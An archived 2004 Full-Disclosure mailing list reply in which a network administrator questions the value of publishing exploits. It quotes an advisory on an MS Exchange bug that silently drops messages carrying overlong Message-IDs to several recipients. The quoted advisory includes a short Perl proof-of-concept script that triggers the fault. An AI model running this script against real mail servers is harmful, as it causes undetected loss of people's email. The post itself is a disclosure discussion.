lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200405130145.i4D1j3428741@netsys.com>
From: randallm at fidmail.com (RandallM)
Subject: RE: Full-Disclosure MS Exchange message lost-so lets post how

I am using the following only as an example that has been slightly discussed
here. The gentleman rightly posts and gives us the information that is very
helpful to be aware of. But then posts the "exploit" example because, in his
own words, 

<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!

Exactly in what way do you think this should speed up the release? 

Granted, this is a "lost" email exploit. But what if it was a dangerous
exploit? I have seen these also posted.

I know of "script Kiddies" who would never be able to find the exploit but
are part of the group who "know how to use this 'FEATURE'...". They watch
here and others just for that purpose. Where is accountability? I am torn
between this issue of needed knowledge and exposed exploit. As a network
Administrator I have no need for the exploit but for the knowledge. I have
found no better place then here for that. Then on the other hand you all
give out the exploits for confirmation which is needed also. Just some of my
personal inward ramblings.

thank you
Randall M
 

<|>--__--__--
<|>
<|>Message: 20
<|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST)
<|>From: I.D.S@....de
<|>To: full-disclosure@...ts.netsys.com
<|>Subject: [Full-Disclosure] MS Exchange message lost
<|>
<|>* MS Exchange duplicate message fault (message lost)
<|>*
<|>* MS Exchange (all versions affected) duplicate message fault
<|>*
<|>* I discovered this bug independently on 10, 2003
<|>*
<|>* public post 05, 2004
<|>*
<|>* Helmut Schmitz < i.d.s@....de >
<|>*
<|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */
<|>
<|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
<|>Messages with long message ids (>189 bytes?)to more than one recipient
<|>(cc),
<|>the message will not delivered correctly ... there is no correct logging
<|>!!,
<|>the messages will be delivered to only one Recipient ... the message to
<|>the
<|>other will be lost !!
<|>
<|>I have send this issue to Microsoft (10.2003) ... some months later
<|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
<|>some reg settings fixes (workaround ;-) the problem.
<|>
<|>Perl Example (test exploit) ...
<|>
<|>#!/usr/bin/perl -w
<|>use Net::SMTP;
<|>$from = 'sender@...rdomain.de';
<|>$to = 'user1@...rdomain.de';
<|>$cc = 'user2@...rdomain.de';
<|>$subject = 'Test Email';
<|>$smtp = Net::SMTP->new('yourmailserver');
<|>$smtp->mail($from);
<|>$smtp->to($to);
<|>$smtp->cc($cc);
<|>$smtp->data();
<|>$smtp->datasend("To: <$to>\n");
<|>$smtp->datasend("Cc: <$cc>\n");
<|>$smtp->datasend("From:  <$from>\n");
<|>$smtp->datasend("Subject: $subject\n");
<|>$smtp->datasend("Message-ID:
<|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte
<|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng
<|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei
<|>feejktmhedgedherngrondljzhng> \n");
<|>$smtp->datasend("Hallo\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->datasend("123\n");
<|>$smtp->dataend();
<|>$smtp->quit;
<|>
<|>Background:
<|>Duplicate detection is decided by three factors.  These are MessageID,
<|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the
<|>store.  These are used to build a unique key when the message is
<|>submitted.
<|>If all the factors are the same value, then we recognize the message as
<|>duplicate.
<|>
<|>###################################
<|>
<|>I think some people know how to use this "FEATURE" ...  I hope this post
<|>will speed up the fix release!
<|>
<|>Regards,
<|>Helmut Schmitz


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ